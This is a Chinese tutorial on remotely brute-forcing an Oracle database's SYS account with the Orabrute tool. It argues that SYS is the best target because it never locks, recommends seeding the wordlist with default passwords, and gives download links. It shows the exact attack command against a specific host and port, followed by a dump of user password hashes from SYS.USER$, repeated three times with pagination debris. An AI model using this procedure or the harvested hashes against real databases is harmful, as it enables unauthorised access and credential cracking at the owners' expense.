通过Orabrute暴力破解oracle密码
1 标准的Oracle 密码可以由英文字母,数字,#,下划线(_),美元字符($)构成,密码的最大长度为30 字符;Oracle 密码不能以"$","#","_"或任何数字开头;密码不能包含"SELECT","DELETE","CREATE"这类的Oracle/SQL 关键字。
2 Oracle 的弱算法加密机制:两个相同的用户名和密码在两台不同的Oracle 数据库机器中,将具有相同的
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。
3 Oracle 默认配置下,每个帐户如果有10 次的失败登录,此帐户将会被锁定。但是SYS 帐户在Oracle 数
据库中具有最高权限,能够做任何事情,包括启动/关闭Oracle 数据库。即使SYS 被锁定,也依然能够访问
数据库。
由前面的基础知识3,可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。
可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的
原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
Orabrute 的下载地址http://www.ngssoftware.com/research/papers/oraclepasswords.zip
Orabrute 的官方文档http://www.ngssoftware.com/research/papers/oraclepasswords.pdf
Orabrute 的使用方法为:
D:softoracleOrabrute>orabrute Orabrute v 1.2 by Paul M. Wright and David J. Morgan: orabrute D:softoracleOrabrute>
Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。
D:softoracleOrabrute>orabrute 172.19.111.37 1521 orcl 2000 Orabrute v 1.2 by Paul M. Wright and David J. Morgan: orabrute sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql NAME PASSWORD ------------------------------ ------------------------------ SYS D4C5016086B2DC6A PUBLIC CONNECT RESOURCE DBA SYSTEM D4DF7931AB130E37 SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE IMP_FULL_DATABASE NAME PASSWORD ------------------------------ ------------------------------ OUTLN 4A3BA55E08595C81 RECOVERY_CATALOG_OWNER AQ_ADMINISTRATOR_ROLE AQ_USER_ROLE OEM_MONITOR HS_ADMIN_ROLE TRACESVR F9DA8977092B7B81 WDEVELOPER AURORA$JIS$UTILITY$ 000001501983169 OSE$HTTP$ADMIN 000001198644021 AURORA$ORB$UNAUTHENTICATED -000000728729637 NAME PASSWORD ------------------------------ ------------------------------ TIMESERIES_DEVELOPER TIMESERIES_DBA CTXAPP TOAD 361001117A542AC1 DBSNMP E066D214D5421CCC WACOS 1AD491DE05C669FB UTCORE 9C5CB992189E20D9 NMS 5E9DEFE765774DC1 JAVA_ADMIN JAVA_DEPLOY SCHEDULER_ADMIN NAME PASSWORD ------------------------------ ------------------------------ DIP CE4A36B8E06CA59C QUEST_SL_USER TSMSYS 3DF26A8B17D0F29F OEM_ADVISOR JAVAUSERPRIV JAVAIDPRIV JAVASYSPRIV JAVADEBUGPRIV GATHER_SYSTEM_STATISTICS LOGSTDBY_ADMINISTRATOR GLOBAL_AQ_USER_ROLE GLOBAL NAME PASSWORD ------------------------------ ------------------------------ UTNEW C686642569070067 _NEXT_USER TC_ADMIN_ROLE TC_MGR_ROLE TC_LDR_ROLE 49 rows selected. NAME PASSWORD ------------------------------ ------------------------------ SYS D4C5016086B2DC6A PUBLIC CONNECT RESOURCE DBA SYSTEM D4DF7931AB130E37 SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE IMP_FULL_DATABASE NAME PASSWORD ------------------------------ ------------------------------ OUTLN 4A3BA55E08595C81 #p#分页标题#e#
RECOVERY_CATALOG_OWNER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
OEM_MONITOR
HS_ADMIN_ROLE
TRACESVR F9DA8977092B7B81
WDEVELOPER
AURORA$JIS$UTILITY$ 000001501983169
OSE$HTTP$ADMIN 000001198644021
AURORA$ORB$UNAUTHENTICATED -000000728729637
NAME PASSWORD
------------------------------ ------------------------------
TIMESERIES_DEVELOPER
TIMESERIES_DBA
CTXAPP
TOAD 361001117A542AC1
DBSNMP E066D214D5421CCC
WACOS 1AD491DE05C669FB
UTCORE 9C5CB992189E20D9
NMS 5E9DEFE765774DC1
JAVA_ADMIN
JAVA_DEPLOY
SCHEDULER_ADMIN
NAME PASSWORD
------------------------------ ------------------------------
DIP CE4A36B8E06CA59C
QUEST_SL_USER
TSMSYS 3DF26A8B17D0F29F
OEM_ADVISOR
JAVAUSERPRIV
JAVAIDPRIV
JAVASYSPRIV
JAVADEBUGPRIV
GATHER_SYSTEM_STATISTICS
LOGSTDBY_ADMINISTRATOR
GLOBAL_AQ_USER_ROLE GLOBAL
NAME PASSWORD
------------------------------ ------------------------------
UTNEW C686642569070067
_NEXT_USER
TC_ADMIN_ROLE
TC_MGR_ROLE
TC_LDR_ROLE
49 rows selected.
NAME PASSWORD
#p#分页标题#e#------------------------------ ------------------------------
SYS D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
NAME PASSWORD
------------------------------ ------------------------------
OUTLN 4A3BA55E08595C81
RECOVERY_CATALOG_OWNER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
OEM_MONITOR
HS_ADMIN_ROLE
TRACESVR F9DA8977092B7B81
WDEVELOPER
AURORA$JIS$UTILITY$ 000001501983169
OSE$HTTP$ADMIN 000001198644021
AURORA$ORB$UNAUTHENTICATED -000000728729637
NAME PASSWORD
------------------------------ ------------------------------
TIMESERIES_DEVELOPER
TIMESERIES_DBA
CTXAPP
TOAD 361001117A542AC1
DBSNMP E066D214D5421CCC
WACOS 1AD491DE05C669FB
UTCORE 9C5CB992189E20D9
NMS 5E9DEFE765774DC1
JAVA_ADMIN
JAVA_DEPLOY
SCHEDULER_ADMIN
NAME PASSWORD
------------------------------ ------------------------------
DIP CE4A36B8E06CA59C
QUEST_SL_USER
TSMSYS 3DF26A8B17D0F29F #p#分页标题#e#
OEM_ADVISOR
JAVAUSERPRIV
JAVAIDPRIV
JAVASYSPRIV
JAVADEBUGPRIV
GATHER_SYSTEM_STATISTICS
LOGSTDBY_ADMINISTRATOR
You will need to delete or move thepasswordsare.txt file befor
e running again.
D:softoracleOrabrute>
相关阅读:
1、睿智的目标检测66——Pytorch搭建YoloV8目标检测平台
2、伪装目标检测系列论文阅读之:C2FNet《Context-aware Cross-level Fusion Network for Camouflaged Object Detection》
3、JetsonOrin实时三维目标检测,PointPillar-TensorRT结合Ros可视化
4、【DAL复现】Detecting As Labeling:Rethinking LiDAR-camera Fusion in 3D Object Detection
5、yolov9目标检测测试报错AttributeError: ‘list‘ object has no attribute ‘device‘
还没有评论,来说两句吧...